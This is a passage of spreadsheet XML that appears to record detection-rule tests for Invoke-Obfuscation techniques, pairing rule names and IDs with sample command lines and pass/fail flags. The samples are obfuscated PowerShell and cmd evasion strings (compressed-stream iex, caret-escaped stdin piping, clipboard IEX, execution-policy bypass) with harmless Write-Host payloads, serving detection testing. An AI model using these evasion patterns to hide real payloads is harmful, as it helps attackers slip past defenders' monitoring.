      <c r="K1283" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1284" ht="15.75" customHeight="1" s="42">
      <c r="A1284" s="43" t="n"/>
      <c r="B1284" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1284" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1284" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1284" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMaNd "$stream = [System.IO.Compression.DeflateStream]::new($ms, 0); $reader = [System.IO.StreamReader]::new($stream, [System.Text.Encoding]::UTF8); iex $reader.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1284" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1284" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1284" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1284" s="43" t="n"/>
      <c r="J1284" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1284" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1285" ht="15.75" customHeight="1" s="42">
      <c r="A1285" s="43" t="n"/>
      <c r="B1285" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C1285" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D1285" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E1285" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "set A=in^voke &amp; set B=environment &amp; echo %A% | powershell -"</t>
        </is>
      </c>
      <c r="F1285" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1285" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1285" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1285" s="43" t="n"/>
      <c r="J1285" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1285" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1286" ht="15.75" customHeight="1" s="42">
      <c r="A1286" s="43" t="n"/>
      <c r="B1286" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C1286" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D1286" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E1286" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F1286" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1286" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1286" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1286" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1286" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1286" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1287" ht="15.75" customHeight="1" s="42">
      <c r="A1287" s="43" t="n"/>
      <c r="B1287" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C1287" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D1287" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E1287" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -COmMANd "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F1287" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1287" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1287" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1287" s="36" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1287" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1287" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1288" ht="15.75" customHeight="1" s="42">
      <c r="A1288" s="43" t="n"/>
      <c r="B1288" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C1288" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D1288" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E1288" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F1288" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1288" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1288" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1288" s="36" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1288" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1288" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1289" ht="15.75" customHeight="1" s="42">
      <c r="A1289" s="43" t="n"/>
      <c r="B1289" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C1289" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D1289" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E1289" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExeCuTIoNpolIcy Bypass -CommANd "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F1289" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1289" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1289" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1289" s="36" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1289" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1289" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1290" ht="15.75" customHeight="1" s="42">
      <c r="A1290" s="43" t="n"/>
      <c r="B1290" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C1290" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D1290" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E1290" s="36" t="inlineStr">
        <is>
          <t>set a=1 &amp; set invoke=payload &amp; powershell -c "Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F1290" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1290" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1290" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1290" s="36" t="n"/>
      <c r="J1290" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1290" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1291" ht="15.75" customHeight="1" s="42">
      <c r="A1291" s="43" t="n"/>
      <c r="B1291" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C1291" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D1291" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E1291" s="36" t="inlineStr">
        <is>
          <t>set a=1 &amp; set invoke=payload &amp; powershell -C "Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F1291" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1291" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1291" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1291" s="36" t="n"/>
      <c r="J1291" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1291" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1292" ht="15.75" customHeight="1" s="42">
      <c r="A1292" s="43" t="n"/>
      <c r="B1292" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1292" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1292" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1292" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo Write-Host 'Test' | c^l^i^p.exe &amp;&amp; powershell -c \"IEX ([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1292" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1292" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1292" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1292" s="36" t="n"/>
      <c r="J1292" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1292" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1293" ht="15.75" customHeight="1" s="42">
      <c r="A1293" s="43" t="n"/>
      <c r="B1293" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1293" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1293" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1293" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo Write-Host 'Test' | clip &amp; powershell -c \"IEX ([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1293" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1293" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1293" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1293" s="36" t="n"/>
      <c r="J1293" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1293" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1294" ht="15.75" customHeight="1" s="42">
      <c r="A1294" s="43" t="n"/>
      <c r="B1294" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1294" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1294" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1294" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1294" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1294" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1294" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1294" s="36" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1294" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1294" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1295" ht="15.75" customHeight="1" s="42">
      <c r="A1295" s="43" t="n"/>
      <c r="B1295" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1295" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1295" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1295" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAND "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1295" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1295" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1295" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1295" s="36" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1295" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1295" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1296" ht="15.75" customHeight="1" s="42">
      <c r="A1296" s="43" t="n"/>
      <c r="B1296" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1296" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1296" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1296" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1296" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1296" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1296" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1296" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1296" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1296" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1297" ht="15.75" customHeight="1" s="42">
      <c r="A1297" s="43" t="n"/>
      <c r="B1297" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1297" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1297" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1297" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMaND "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1297" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1297" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1297" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1297" s="36" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1297" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1297" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1298" ht="15.75" customHeight="1" s="42">
      <c r="A1298" s="43" t="n"/>
      <c r="B1298" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1298" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1298" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1298" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMAnD "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1298" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1298" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1298" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1298" s="36" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1298" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1298" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1299" ht="15.75" customHeight="1" s="42">
      <c r="A1299" s="43" t="n"/>
      <c r="B1299" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1299" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1299" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1299" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1299" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1299" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1299" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1299" s="36" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1299" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1299" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1300" ht="15.75" customHeight="1" s="42">
      <c r="A1300" s="43" t="n"/>
      <c r="B1300" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1300" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1300" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1300" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMaND "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1300" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1300" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1300" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1300" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1300" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1300" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1301" ht="15.75" customHeight="1" s="42">
      <c r="A1301" s="43" t="n"/>
      <c r="B1301" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1301" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1301" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1301" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c echo Write-Host 'Bypass Test' | clip &amp; powershell -c IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1301" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1301" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1301" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1301" s="43" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1301" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1301" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1302" ht="15.75" customHeight="1" s="42">
      <c r="A1302" s="43" t="n"/>
      <c r="B1302" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1302" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1302" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1302" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c echo Write-Host "'Bypass Test'" | clip &amp; powershell -c IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1302" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1302" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1302" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1302" s="43" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1302" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1302" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1303" ht="15.75" customHeight="1" s="42">
      <c r="A1303" s="43" t="n"/>
      <c r="B1303" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1303" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1303" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1303" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" echo Write-Host "'Bypass Test'" | clip &amp; powershell /"c" IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1303" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1303" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1303" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1303" s="43" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1303" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1303" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1304" ht="15.75" customHeight="1" s="42">
      <c r="A1304" s="43" t="n"/>
      <c r="B1304" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1304" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1304" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1304" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" echo Write-Host "'Bypass Test'" | clip &amp; powershell -C IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1304" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1304" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1304" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1304" s="36" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1304" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1304" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1305" ht="15.75" customHeight="1" s="42">
      <c r="A1305" s="43" t="n"/>
      <c r="B1305" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1305" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1305" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1305" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C echo Write-Host "'Bypass Test'" | clip &amp; powershell /"c" IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1305" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1305" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1305" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1305" s="36" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1305" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1305" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1306" ht="15.75" customHeight="1" s="42">
      <c r="A1306" s="43" t="n"/>
      <c r="B1306" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1306" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1306" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1306" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" echo Write-Host "'Bypass Test'" | clip &amp; powershell -"c" IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1306" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1306" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1306" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1306" s="43" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1306" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1306" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1307" ht="15.75" customHeight="1" s="42">
      <c r="A1307" s="43" t="n"/>
      <c r="B1307" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1307" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1307" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1307" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C echo Write-Host "'Bypass Test'" | clip &amp; powershell -c IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1307" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1307" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1307" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1307" s="36" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1307" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1307" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1308" ht="15.75" customHeight="1" s="42">
      <c r="A1308" s="43" t="n"/>
      <c r="B1308" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1308" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
